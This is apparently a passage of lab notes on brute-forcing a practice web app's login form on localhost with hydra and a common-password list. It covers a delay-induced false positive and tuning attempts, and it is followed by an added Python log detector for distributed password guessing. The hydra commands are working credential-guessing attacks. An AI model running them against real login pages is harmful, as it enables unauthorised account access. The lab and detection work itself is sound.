Try submitting the form: the backend's response is noticeably delayed by 2 seconds.

Try hydra again, same as before:

```bash
hydra -V \
-l admin \
-P 10-million-password-list-top-10000.txt \
-s 8086 \
-f localhost \
http-form-get "/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
```

admin:123456
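But testing afterwards showed that this password is wrong, which means hydra was affected by the delay and reported a false positive; the requests may have to be sent with a deliberate delay.

Even after adding the delay-related parameters, hydra still behaves a bit oddly: sometimes it doesn't find the correct password, and the result is different on every run @@. Setting the difficulty back to low and retesting gives the same thing QQ, so I may have to try a different tool.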
```bash
hydra -e ns -F -t 1 -W 5 \
-v -V \
-l admin \
-P 10-million-password-list-top-10000.txt \
-s 8086 \
-f localhost \
http-form-get \
"/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
```

```bash
hydra -V -t 1 -c 3 -l admin -P 10-million-password-list-top-10000.txt -s 8086 -f localhost http-form-get "/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
```
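
Seen from the server, the runs above arrive as slow single-threaded traffic, so a request-rate threshold can miss them; because this form submits credentials by GET, each attempt also lands in the access log with its query string. The following is an added example (not part of the original notes) that flags a source trying many different passwords for one account. It assumes an Apache-style access log, and the sample lines, IP addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qs

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" \d{3}')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def sample_log():
    """Constructed access-log lines (not from the page): one source walking a
    password list at one request every 3 s, plus a user who mistypes once."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    row = '{} - - [{}] "GET /vulnerabilities/brute/?username={}&password={}&Login=Login HTTP/1.1" 200 4321'
    lines = [row.format("203.0.113.7", (t0 + timedelta(seconds=3 * i)).strftime(TS_FMT), "admin", f"guess{i}")
             for i in range(8)]
    lines += [row.format("198.51.100.4", (t0 + timedelta(seconds=40 * i)).strftime(TS_FMT), "alice", pw)
              for i, pw in enumerate(["typo", "correct"])]
    lines.append('198.51.100.4 - - [01/Jan/2024:12:05:00 +0000] "GET /index.php HTTP/1.1" 200 100')
    return "\n".join(lines)

def parse_attempts(log_text, path="/vulnerabilities/brute/"):
    """Yield (ip, time, username, password) for each login request to `path`."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(3))
        qs = parse_qs(url.query, keep_blank_values=True)
        if url.path == path and "username" in qs:
            when = datetime.strptime(m.group(2), TS_FMT)
            yield m.group(1), when, qs["username"][0], qs.get("password", [""])[0]

def find_bruteforce(log_text, max_distinct=5, window=timedelta(minutes=5)):
    """Return {(ip, username): n} where one source tried n > max_distinct
    different passwords for one account inside a sliding time window."""
    seen = defaultdict(list)
    for ip, when, user, pw in parse_attempts(log_text):
        seen[(ip, user)].append((when, pw))
    flagged = {}
    for key, events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # drop attempts that fell out of the window
            distinct = len({pw for _, pw in events[start:end + 1]})
            if distinct > max_distinct:
                flagged[key] = max(flagged.get(key, 0), distinct)
    return flagged

if __name__ == "__main__":
    print(find_bruteforce(sample_log()))
```

Counting distinct passwords per account instead of requests per second keeps the check effective when the client spaces its attempts out, and a user who mistypes once stays below the threshold.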